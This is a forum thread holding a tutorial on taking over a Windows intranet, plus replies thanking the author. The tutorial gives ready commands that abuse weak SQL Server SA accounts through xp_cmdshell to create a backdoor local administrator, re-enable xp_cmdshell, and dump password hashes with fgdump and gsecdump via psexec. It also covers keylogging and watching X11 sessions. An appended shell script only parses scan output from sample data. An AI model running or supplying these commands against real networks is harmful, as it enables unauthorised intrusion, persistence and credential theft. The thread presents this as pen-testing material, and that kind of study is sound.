
Thread: Tutorial : Intranet Exploitation

  1. #1 williamc (joined Feb 2010, Chico CA)

    Tutorial : Intranet Exploitation

    This tutorial will demonstrate how to gain Domain Administrator on a typical Windows intranet through common security oversights. Most of these tools are Windows based, but may run in Wine. Please post if you can verify this, or if you know a Linux equivalent tool.


    Obviously start with the network you've been DHCP'd.

    NET VIEW command

    Displays a list of computers in a specified workgroup or the shared resources available on a specified computer.

    NET VIEW [\\computername [/CACHE] | /DOMAIN[:domainname]]

    NET VIEW /NETWORK:NW [\\computername]

    Domain Zone Transfers

    Starting with the DNS servers you DHCP'd with, try zone transfers. If successful, extrapolate Class C (/24) networks from the individual IP addresses.

    dig axfr %domain% @%dnsserver%

    Nmap scanning

    Perform a ping sweep of the network range.

    nmap -sP -v xx.xx.xx.xx/24 -oG ping_results.txt
    Clean up the ping sweep.

    # -oG writes nmap's grepable format, where every live host is a "Host: a.b.c.d () Status: Up"
    # line with the address in the second field. Grepping the normal output for 'up' also matches
    # the "(N hosts up)" summary line and breaks when nmap changes its normal output layout.
    # (-sn is the newer spelling of -sP; both do a host discovery sweep only.)
    grep 'Status: Up' ping_results.txt | cut -d' ' -f2 > ping_results_final.txt
    Generate IP list from the known net ranges

    gping xx.xx.0.255 >> iplist.txt
    gping may be found here:


    SQL Discovery and Exploitation

    A common entry point to a network is through insecure SQL servers. SQLPing 3.0 performs both active and passive scans of your network in order to identify all of the SQL Server/MSDE installations in your enterprise. It also adds brute-force password capabilities and the ability to brute-force multiple instances.

    It can be found here:

    Once you have found a weak SA account, use the command-line OSQL tool found bundled with MSDE. This is the syntax to create an account and promote it to a local administrator:
    osql -S %servername% -U %username% -P %password% -t 15 -b -Q "xp_cmdshell 'net user pwnd pwndABC123 /add'"
    osql -S %servername% -U %username% -P %password% -t 15 -b -Q "xp_cmdshell 'net localgroup administrators pwnd /add'"

    With newer releases of SQL, you may find that the xp command shell has been disabled. Thoughtfully, Microsoft allows you to re-enable this feature!
    REM RECONFIGURE must follow each sp_configure: without it the change stays pending, and
    REM enabling 'xp_cmdshell' is rejected as an advanced option because 'show advanced options'
    REM has not actually taken effect yet.
    osql -S %servername% -U %username% -P %password% -t 15 -b -Q "EXEC sp_configure 'show advanced options', 1; RECONFIGURE"
    osql -S %servername% -U %username% -P %password% -t 15 -b -Q "EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE"

    As a local administrator, you can now dump the HASHES for the local workstation. Use FGDump, found here:

    fgdump -h %hostname% -u pwnd -p pwndABC123

    If FGDump doesn't work, try GSECDump, found here:

    GSECDump should be used with psexec, found here:

    psexec \\%hostname% -u pwnd -p pwndABC123 -s -f -c gsecdump.exe -s

    X11 exploitation

    If your nmap scans reveal port 6000-6005 being open, chances are you may be dealing with the X11 protocol (X Windows). X11 is plain-text and can be keylogged and remotely viewed. You will need the NSAT (Network Security Analysis Tool) which can be found here:

    You may find that the tool does not complete a make. Download my fixed version towards the bottom of the post.

    Filter your nmap results to only show ports 6000-6005 and copy the results into a text file. NSAT will scan the hosts in this text file. Syntax:

    nsat -C nsat_X.conf -n -f iplist.txt

    The results should show something similar to this:

    [port] - X Windows
    [port] - dumpable/sniffable

    Target the IPs that are "dumpable/sniffable" with XSpy, found here:



    You should now be keylogging this session. If you want to view the actual desktop of the user, use xwatchwin, found here:



    FTP exploitation

    Utilizing NSAT, filter your nmap results for port 21. Take this IP list and run it through NSAT.
    nsat -C nsat_FTP.conf -n -f iplist.txt

    The results should show something similar to this:

    - anonymous login
    - anonymous login

    Share Enumeration

    A common security flaw occurs when users define file shares with lax security, allowing unauthorized users to see sensitive files. ShareEnum looks for these open shares on the network. You can find it here:

    NetworkSleuth is a network file searching utility, that allows you to quickly locate files across a network. You can search for specific file names or for specific file types (e.g. files named/containing password). Get it here:

    I hope this helps some of you with your pen-testing endeavors. Please add to this tutorial with your own methodologies.
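    The shell script below is an added example and is not part of williamc's post or of any tool it links. It performs the text-munging steps of the recon chain above offline: it turns the A records of a zone transfer into the /24 networks to sweep, pulls the live addresses out of a ping sweep, and filters a port scan down to hosts with an open port in a range such as 6000-6005 or 21, which is the list the post says to hand to NSAT. The domain example.com, the 10.0.x.x addresses and both tool outputs embedded in the script are constructed samples, not captures from a real network; the dig and nmap commands that would produce such output on an engagement are named in the comments.

```shell
#!/bin/sh
# Added example, not from the original post. Parses the output of the recon
# tools above so the "filter your nmap results" steps are repeatable.
# Every address, hostname and record below is CONSTRUCTED sample data.

# What `dig axfr example.com @10.0.1.5` prints when the server allows AXFR
# (constructed; the record set and the domain are made up).
SAMPLE_AXFR='example.com.        3600 IN SOA   ns1.example.com. hostmaster.example.com. 2010020101 3600 900 604800 86400
example.com.        3600 IN NS    ns1.example.com.
ns1.example.com.    3600 IN A     10.0.1.5
mail.example.com.   3600 IN A     10.0.1.20
fs01.example.com.   3600 IN A     10.0.2.15
sql01.example.com.  3600 IN A     10.0.2.40
www.example.com.    3600 IN CNAME fs01.example.com.
ipv6.example.com.   3600 IN AAAA  2001:db8::1'

# What `nmap -v -p 21,6000-6005 -oG - 10.0.1.0/24 10.0.2.0/24` prints
# (constructed; grepable output puts the address in field 2 of every
# "Host:" line, which is what makes it safe to cut).
SAMPLE_GNMAP='# Nmap 5.21 scan initiated as: nmap -v -p 21,6000-6005 -oG - 10.0.1.0/24 10.0.2.0/24
Host: 10.0.1.5 (ns1.example.com)   Status: Up
Host: 10.0.1.5 (ns1.example.com)   Ports: 21/closed/tcp//ftp///, 6000/open/tcp//X11///   Ignored State: filtered (5 ports)
Host: 10.0.1.20 (mail.example.com) Status: Up
Host: 10.0.1.20 (mail.example.com) Ports: 21/open/tcp//ftp///, 6000/filtered/tcp//X11///
Host: 10.0.2.15 (fs01.example.com) Status: Up
Host: 10.0.2.15 (fs01.example.com) Ports: 21/open/tcp//ftp///, 6001/open/tcp//X11:1///
Host: 10.0.2.40 ()                 Status: Down
# Nmap done -- 512 IP addresses (3 hosts up) scanned'

# Zone transfer -> unique /24 networks (reads dig output on stdin).
# Only IPv4 A records count; SOA/NS/CNAME/AAAA lines are skipped.
zone_to_nets() {
    awk '$4 == "A" && $5 ~ /^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$/ {
             split($5, o, ".")
             print o[1] "." o[2] "." o[3] ".0/24"
         }' | sort -u
}

# Ping sweep -> live addresses (reads grepable nmap output on stdin).
live_hosts() {
    awk '/^Host:/ && /Status: Up/ { print $2 }'
}

# Port scan -> addresses with an OPEN tcp port inside $1 ("21" or "6000-6005"),
# one per line, ready to be written to the iplist.txt that NSAT consumes.
# Closed and filtered entries are ignored, so a host listed here really answered.
hosts_with_open_port() {
    awk -v range="$1" '
        BEGIN {
            n = split(range, r, "-")
            lo = r[1] + 0
            hi = (n == 2) ? r[2] + 0 : lo
        }
        /^Host:/ && /Ports:/ {
            ip = $2
            line = $0
            sub(/.*Ports: /, "", line)                 # keep only the port list
            sub(/[ \t]+Ignored State:.*$/, "", line)   # drop the trailing summary
            m = split(line, entries, ", ")
            for (i = 1; i <= m; i++) {
                split(entries[i], f, "/")              # port/state/proto/owner/service/...
                if (f[2] == "open" && f[3] == "tcp" && f[1] + 0 >= lo && f[1] + 0 <= hi) {
                    print ip
                    break
                }
            }
        }'
}

# Walk the chain on the sample data; on an engagement replace the printf
# lines with the dig / nmap commands named in the comments above.
printf '%s\n' "$SAMPLE_AXFR"  | zone_to_nets
printf '%s\n' "$SAMPLE_GNMAP" | live_hosts
printf '%s\n' "$SAMPLE_GNMAP" | hosts_with_open_port 6000-6005   # X11 candidates for nsat_X.conf
printf '%s\n' "$SAMPLE_GNMAP" | hosts_with_open_port 21          # FTP candidates for nsat_FTP.conf
```

    The functions read on stdin so the same script works on saved files (`hosts_with_open_port 21 < scan.gnmap > iplist.txt`). Filtering on the state field rather than just the port number matters: a host whose X11 ports show as filtered would otherwise be handed to NSAT and waste a scan.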


  2. #2 (joined Mar 2007)


    Thanks for the tutorial williamc. Officially though I have to move it to general IT because it is not based on backtrack. Nothing personal I'm just following the rules.

  3. #3 s1lang (joined Sep 2007)


    Thank you for this mate

  4. #4 (joined May 2008)


    Thanks for the tutorial

  5. #5 (joined Feb 2006)

    thanks

    Ran across this, nice job thanks.

  6. #6 williamc


    Updated. Now you can use xp command shell on newer SQL installations that have it disabled by default.

  7. #7 ShadowKill (joined Dec 2007)


    Quote, originally posted by williamc:
    Updated. Now you can use xp command shell on newer SQL installations that have it disabled by default.
    Very nice work, brother. It's good to see that knowledge isn't just being hoarded for personal gain, but is being shared for all the right reasons. Neophytes take heed: this is the kind of example you, and even those of us more versed in the security realm, should all follow....

    I look forward to any and everything else you have to offer.

    "The goal of every man should be to continue living even after he can no longer draw breath."


  8. #8 Talkie Toaster (joined Jun 2008)

    Thanks man


    Thanks for sharing, well written tuts like this have me just itching to try out some new tools.

    Time to break my home network, again...


  9. #9 (joined Jan 2010, outside Chicago, IL)


    Nice work williamc. SQLPing looks interesting.

    I added a section on gsecdump to the password cracking guide.
    I like the bleeding edge, but I don't like blood loss
